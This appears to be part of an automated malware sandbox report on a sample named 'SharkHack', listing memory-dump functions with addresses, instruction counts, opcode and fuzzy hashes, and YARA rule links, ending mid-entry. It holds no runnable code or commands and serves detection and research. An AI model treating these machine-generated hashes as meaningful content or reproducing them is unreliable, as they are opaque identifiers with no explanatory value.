                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: e16edebb58c9f1a3dd6bc61f8c53c8e1e01af82b4ca866e40d7578e780738dc1
                                                                                                          • Instruction ID: ba0a9788fa568da237108fa3aabdccc71d2d575e084a39263c24656259b8cbee
                                                                                                          • Opcode Fuzzy Hash: e16edebb58c9f1a3dd6bc61f8c53c8e1e01af82b4ca866e40d7578e780738dc1
                                                                                                          • Instruction Fuzzy Hash: B1F0E92170D2D45BD71966699820B2F3F9BAFC6211F18807AE605CB3C1CD656C0683F6
                                                                                                          Function 0874D257 Relevance: .5, Instructions: 457COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 946a4510d0a7ff97e91c5ea1c2d1d20b4813f6cd8500fc99353fcdc2b18370bd
                                                                                                          • Instruction ID: 5df6d6af8a903c8dc4a7bbeb685ae149338b4ccf7c81327cbd813c733a50658f
                                                                                                          • Opcode Fuzzy Hash: 946a4510d0a7ff97e91c5ea1c2d1d20b4813f6cd8500fc99353fcdc2b18370bd
                                                                                                          • Instruction Fuzzy Hash: F8F1B230609740CFC305BB79E8981297FF5EF8A614F4589AED4C9CB296DB389C0AC752
                                                                                                          Function 0874DE76 Relevance: .4, Instructions: 441COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e960615f9238b4aae13fa58dfb16cc7531961dc18e7f6ad75638f602e52e5f4e
                                                                                                          • Instruction ID: 48bf2d12630f8ef017c3c7995d172183f30669cc61dd5c8522c0e91402ee57ee
                                                                                                          • Opcode Fuzzy Hash: e960615f9238b4aae13fa58dfb16cc7531961dc18e7f6ad75638f602e52e5f4e
                                                                                                          • Instruction Fuzzy Hash: 06E1BF35A11210CFD704FB79E98866DBBF1FF88624F4088AAD489E7350DE389C06C762
                                                                                                          Function 0874E4B8 Relevance: .4, Instructions: 425COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9697530d8d0b03481351f6d1145a61d80ff405bf033e945fb128be3cf561c3b9
                                                                                                          • Instruction ID: 9a4c4fd5ebd772e5e8337f1f9fd655a4c23c48883d843ff1c55c7154cad19aff
                                                                                                          • Opcode Fuzzy Hash: 9697530d8d0b03481351f6d1145a61d80ff405bf033e945fb128be3cf561c3b9
                                                                                                          • Instruction Fuzzy Hash: 91F12D79E04214CFCB04AF78EA8829C7BF1FB48725F408869D44AE7354DB389D568FA1
                                                                                                          Function 0874E4C8 Relevance: .4, Instructions: 420COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1f845f1d60b43a4324e1b0328313e50f5ad3855706a602409b614abc26644e3
                                                                                                          • Instruction ID: 190597a0c30b6babfae5f65a1d21d0b9c6fdf41358fb6a738856de3baff64eb5
                                                                                                          • Opcode Fuzzy Hash: a1f845f1d60b43a4324e1b0328313e50f5ad3855706a602409b614abc26644e3
                                                                                                          • Instruction Fuzzy Hash: 6CF12E79E14214CBC704AF78EA8829CBBF1FB48725F408869D44AE7354DF349D568FA1
                                                                                                          Function 0874D26F Relevance: .4, Instructions: 418COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5346ad1a327dc3f909976d75ade34d546d6ceb53cff6da61ef6c68e45c0ac4d9
                                                                                                          • Instruction ID: 50cd88dad8b5be2f1d77225b9f7622484e46afc88e82d057d13a85f1e1c58442
                                                                                                          • Opcode Fuzzy Hash: 5346ad1a327dc3f909976d75ade34d546d6ceb53cff6da61ef6c68e45c0ac4d9
                                                                                                          • Instruction Fuzzy Hash: FAE19130609741CFC316AB79D8981297FF1EF86614F4589EED4C9CB2A6DB388C4AC752
                                                                                                          Function 0874C460 Relevance: .4, Instructions: 366COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd037232f829851d2f2649ed61077564bc6208e1027f721ce7f585baa11dc069
                                                                                                          • Instruction ID: 0ee95f0550122e801e9d68384139bc977cbb6e8dfd6e186cf4a823abd5b9212f
                                                                                                          • Opcode Fuzzy Hash: dd037232f829851d2f2649ed61077564bc6208e1027f721ce7f585baa11dc069
                                                                                                          • Instruction Fuzzy Hash: DAD1BE34A01211DBC705FFB9E98866DBBF1FF88614F458469D489A7344DF389C46CBA2
                                                                                                          Function 0874C439 Relevance: .3, Instructions: 277COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: df8ff99f85a41b1c9af187dac2c6e4844ea19fed3b9ae9bd9cdf9aed70508a65
                                                                                                          • Instruction ID: 89cf99d5e778169591dbca6e206b39d9a31082aa8ad0cc24d421543e0cfc1f1e
                                                                                                          • Opcode Fuzzy Hash: df8ff99f85a41b1c9af187dac2c6e4844ea19fed3b9ae9bd9cdf9aed70508a65
                                                                                                          • Instruction Fuzzy Hash: 86A1CF35A05211DFC705EBB8E98866DBFF1EF89210F4984AAD489D7341DF389C46CB62
                                                                                                          Function 08742BE6 Relevance: .3, Instructions: 253COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 153ca6a5b03eae3498cb3e979d4fdb179afdc5b92ae3675e3d01d09bfb3dca56
                                                                                                          • Instruction ID: f9a627d406e38d1220d0038e2b5274d945e0cc73281a6a64fb6ff3c8c4819dcc
                                                                                                          • Opcode Fuzzy Hash: 153ca6a5b03eae3498cb3e979d4fdb179afdc5b92ae3675e3d01d09bfb3dca56
                                                                                                          • Instruction Fuzzy Hash: 6F81B530A10515CBCB04BFB9E88416DBBF5FF88614F81896EE489A7345DF38885AC767
                                                                                                          Function 0874F902 Relevance: .2, Instructions: 167COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a8ebab876300eed1e01cf8ad1f9a70d1457effa75a140cd4e57cd95862bc76a7
                                                                                                          • Instruction ID: 85a0922110bfdddf2c8160a5137ad4849503294eb648e30b488f73addd2dee2b
                                                                                                          • Opcode Fuzzy Hash: a8ebab876300eed1e01cf8ad1f9a70d1457effa75a140cd4e57cd95862bc76a7
                                                                                                          • Instruction Fuzzy Hash: 6A51C375B10615CBC704FFB9E99966EBBF2EB88614F44842AD448E7344DE38DC0AC792
                                                                                                          Function 08742458 Relevance: .1, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d3fe6379e89dd45abcf0a15e19cd251b1b8c082f8b3a2915e6e68bead2b52d15
                                                                                                          • Instruction ID: 2a445debc8675fe029ea80954fc2ce7e86c1f72cedd0f74c8eb6b065becabfc3
                                                                                                          • Opcode Fuzzy Hash: d3fe6379e89dd45abcf0a15e19cd251b1b8c082f8b3a2915e6e68bead2b52d15
                                                                                                          • Instruction Fuzzy Hash: E7416B31A107099BCB14DFA9C49469DFBB1FF88301F14D66DE809BB225EB70A985CB90
                                                                                                          Function 08741E58 Relevance: .1, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4f8e347d7346ed4ce87ed68841d4d4dc72a33041e65bd95286ad09fd5c0ffb22
                                                                                                          • Instruction ID: 2cb06487789ea9eea78babf1010f51fc4480510ea6d19f2f119d68bec7505ebc
                                                                                                          • Opcode Fuzzy Hash: 4f8e347d7346ed4ce87ed68841d4d4dc72a33041e65bd95286ad09fd5c0ffb22
                                                                                                          • Instruction Fuzzy Hash: CC3146B5D002198FCB10EFA9D844ADEBBF5EB48311F50842AD815B7350DB78A945CBA1
                                                                                                          Function 08741C3D Relevance: .1, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 17e5a8a5ba1112383931bbc14da1942e7892d176094cc6534aa352b35640f1ca
                                                                                                          • Instruction ID: 3e69d776c83cc8e7f25beb72436be3eef891090e7c84b3f4fb8f55203dfcb183
                                                                                                          • Opcode Fuzzy Hash: 17e5a8a5ba1112383931bbc14da1942e7892d176094cc6534aa352b35640f1ca
                                                                                                          • Instruction Fuzzy Hash: 21319E5660E3E06FD7176A3C5C305EA3FA49E9315570A00DBE0C0CF1A7D519898AC3FA
                                                                                                          Function 0874C340 Relevance: .1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09fa667b188b87fae008b6f4ab3b39de5e2f9720dd6a6020994b7ffea774dfc8
                                                                                                          • Instruction ID: 0ff993b34d0b09981519d72e8f2248c5bf945a1adac5dd1a0488376470ea59ae
                                                                                                          • Opcode Fuzzy Hash: 09fa667b188b87fae008b6f4ab3b39de5e2f9720dd6a6020994b7ffea774dfc8
                                                                                                          • Instruction Fuzzy Hash: C831C574B04211DBD705ABBAE8547297BE9FF89615F408466E44DC3280DE3CEC02CB63
                                                                                                          Function 01EBD01C Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e0b36c43a4a2ee3b269e387583fcca9bd9eba4f3c69ae723fc6ecf04838f86a
                                                                                                          • Instruction ID: f92c5506009192c26637051d28edf39d4f9de93cf9f87488bf56907916d42163
                                                                                                          • Opcode Fuzzy Hash: 5e0b36c43a4a2ee3b269e387583fcca9bd9eba4f3c69ae723fc6ecf04838f86a
                                                                                                          • Instruction Fuzzy Hash: C9212571504200DFCB15DF58D9C4B5BBF66FB88318F20C56DD8094B256C33AD447CA61
                                                                                                          Function 01EBD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6697f5f87ae496b7a93d5666dc1a6336f1efef7d7d12825821a2f21c357b1d28
                                                                                                          • Instruction ID: 616d3eb3a60044c1683b354319f921745dfcd9216b2b04124fb162c98c87dca2
                                                                                                          • Opcode Fuzzy Hash: 6697f5f87ae496b7a93d5666dc1a6336f1efef7d7d12825821a2f21c357b1d28
                                                                                                          • Instruction Fuzzy Hash: BD210771504244DFDB05DF98D9C0B6BBBA5FB8872CF20C56DD9094B256C336D446CB61
                                                                                                          Function 08741A70 Relevance: .1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c425cfb598584d5892576d2aba5305aea3209003d1dd48597fbb044826766d2d
                                                                                                          • Instruction ID: ba7ed7646099d798eb38e80613001986943472937e4e141de6d83e2d66adc2d8
                                                                                                          • Opcode Fuzzy Hash: c425cfb598584d5892576d2aba5305aea3209003d1dd48597fbb044826766d2d
                                                                                                          • Instruction Fuzzy Hash: D431F1B0D11218DFDB20DF99C588BDEBFF5AB48315F24802AE518BB255C3B5A845CFA4
                                                                                                          Function 01EBD005 Relevance: .1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b368d3f25953a53695be08e472848961865d8e47043b0c046b7f8166044269a
                                                                                                          • Instruction ID: 005e0057b4d456b6ba2518a0d70c0f9cfb629e2682f07d1251825e87c99883a9
                                                                                                          • Opcode Fuzzy Hash: 0b368d3f25953a53695be08e472848961865d8e47043b0c046b7f8166044269a
                                                                                                          • Instruction Fuzzy Hash: 5C2174755093808FD702CF24D994756BF71FB45318F28C5DAD8498B257C33A980ACB62
                                                                                                          Function 08741DA8 Relevance: .1, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 215cc8e587cddfbdfaa46e91a2c8d4234e35b0689287cfc83d53e20b0a2520b7
                                                                                                          • Instruction ID: a543bdf2a4b8d0e9a973e6a3c16ba2ac85a7e7e5740bfb944c946e0450fa4065
                                                                                                          • Opcode Fuzzy Hash: 215cc8e587cddfbdfaa46e91a2c8d4234e35b0689287cfc83d53e20b0a2520b7
                                                                                                          • Instruction Fuzzy Hash: A611F935D0070A8ECB10EFA9D8804DEFBF4FF48311B50966AD559B3211E730AA95CBA0
                                                                                                          Function 01EBD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: 7d97cbc007b0bf2d27a3459010a1fbf57d757a996a0e515c6e0c2ba80116c5ef
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: 8C11BE75504280DFDB02CF54C9C4B5ABF61FB84628F24C6A9D8494B256C33AD41ACB51
                                                                                                          Function 08742A39 Relevance: .1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09f8fee670556a9139ac5ebfa4db975216f44d5be827ba0588c7d229afb07744
                                                                                                          • Instruction ID: db28c4cf3ac6715b52228fe0dcf60e300bf99b541dbd2263c505a0abc5576ac1
                                                                                                          • Opcode Fuzzy Hash: 09f8fee670556a9139ac5ebfa4db975216f44d5be827ba0588c7d229afb07744
                                                                                                          • Instruction Fuzzy Hash: 6001F236B086510B871AEA2D58804BFBBB7AFC5121315883EE008CB31ADF308C078374
                                                                                                          Function 01EAD7C9 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851310752.0000000001EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EAD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ead000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d6029f8ad6cb5fa5a38b1859092a56709f6153cfa2451c4ab86fc36f7fe51ff9
                                                                                                          • Instruction ID: c387a8f7968757d8292e8d4701b4d1166f1329efda4100090c2b6b597d7d64a6
                                                                                                          • Opcode Fuzzy Hash: d6029f8ad6cb5fa5a38b1859092a56709f6153cfa2451c4ab86fc36f7fe51ff9
                                                                                                          • Instruction Fuzzy Hash: 3D01F7714083409AE7219B9ACD8476BFFE8FF45324F58D42AED1C0E586C239A840C6B1
                                                                                                          Function 08741E48 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2af8a65b90deb66550c33dc99f21159de87a4d2b6b0b2feaf8de5ef9c3dd1187
                                                                                                          • Instruction ID: 559fea5eb807fe695d1cc69d8bf2eeb7b1d20a72653411b0a307e817f84a9dd4
                                                                                                          • Opcode Fuzzy Hash: 2af8a65b90deb66550c33dc99f21159de87a4d2b6b0b2feaf8de5ef9c3dd1187
                                                                                                          • Instruction Fuzzy Hash: 5701B175A4425A8FDB00EFA0D850AEEBBF5AF48211F10502AD801BB265DF34594ACBB1
                                                                                                          Function 0874F86C Relevance: .0, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6a4bccb25e52f6aaec27c6c3b44271c5befb18fdd9a6ac710f402aafc6c2dde9
                                                                                                          • Instruction ID: 5586f67c68b32b71cc9f22767bf227bf103fdf24ec82406789e79413655c842d
                                                                                                          • Opcode Fuzzy Hash: 6a4bccb25e52f6aaec27c6c3b44271c5befb18fdd9a6ac710f402aafc6c2dde9
                                                                                                          • Instruction Fuzzy Hash: CAF09072B001258BC704ABB9EC8566DB7E6FB88614B44896AD449D3340DF38DC06C781
                                                                                                          Function 0874C2F8 Relevance: .0, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 660968e4af4bd64a8e156f12241bbe7874614e1fdfc384270df3a347d73ca38a
                                                                                                          • Instruction ID: bdefedf4fe3b3e2e56ba44e6e7ee7f5df59c990768a0bdcea96beb803fe16867
                                                                                                          • Opcode Fuzzy Hash: 660968e4af4bd64a8e156f12241bbe7874614e1fdfc384270df3a347d73ca38a
                                                                                                          • Instruction Fuzzy Hash: 210131B554E3C08FD713173898549603FB4AF4325270A44DAF484CA1B3DB798859D772
                                                                                                          Function 08742932 Relevance: .0, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fbcf211e50bc04c6d62b24932c9d3d96f53736ce15d80a06e8b16fca4d17f5ab
                                                                                                          • Instruction ID: d97384301ce9b6c90b70d8bcf4491d2c3245e50ad6a18e674ac4bf2750be5881
                                                                                                          • Opcode Fuzzy Hash: fbcf211e50bc04c6d62b24932c9d3d96f53736ce15d80a06e8b16fca4d17f5ab
                                                                                                          • Instruction Fuzzy Hash: F4F082357452046FD3048A5E9C809AAEBEDEFD6620715406BF544C7361CA719C06C2A4
                                                                                                          Function 01EAD7C8 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851310752.0000000001EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EAD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ead000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b9c3bd6e63cc662b013c880d6b04e948d51676fdb0b304580726a67d8868cfe3
                                                                                                          • Instruction ID: 513a0d928efd24efb999ea22af01681742389054828891ec8d9ae398d23a8230
                                                                                                          • Opcode Fuzzy Hash: b9c3bd6e63cc662b013c880d6b04e948d51676fdb0b304580726a67d8868cfe3
                                                                                                          • Instruction Fuzzy Hash: EFF0C271408340AEE7218A1ADC84B66FFA8EF40338F18C45AED1C0E686C379A844CAB0
                                                                                                          Function 08742981 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a08f8e89635c6191c0d02d31f0caa6a8baff6c6e3dc7cd84731e10c01f570b1f
                                                                                                          • Instruction ID: 6d0fb977f15a9022bdb8170b16f11ae9a2f823dd098372f1039c014e3bdbc770
                                                                                                          • Opcode Fuzzy Hash: a08f8e89635c6191c0d02d31f0caa6a8baff6c6e3dc7cd84731e10c01f570b1f
                                                                                                          • Instruction Fuzzy Hash: 4BE065363495405FC7158619EC94D95FFA5EFCA23071540A7F949CB762C5319C1AC660
                                                                                                          Function 08742940 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bee97aed1ea2f120bb9849ec220f84c891ef05ad6eafb2d3e6fc953ac1348850
                                                                                                          • Instruction ID: ce09fb6194332fcf1d57e5524a5e4f87c9e5cea6966d0abb7a9a7fca916e76c5
                                                                                                          • Opcode Fuzzy Hash: bee97aed1ea2f120bb9849ec220f84c891ef05ad6eafb2d3e6fc953ac1348850
                                                                                                          • Instruction Fuzzy Hash: CDE092717002186FD3049B5EDC80E6BFBEEFFD9A20B21807AF545D7360CAB0AC0086A4
                                                                                                          Function 0874F7D3 Relevance: .0, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 127b290c199ddb9e79e85e71259860f7793ff4afc3784ab8d56800eee06ab797
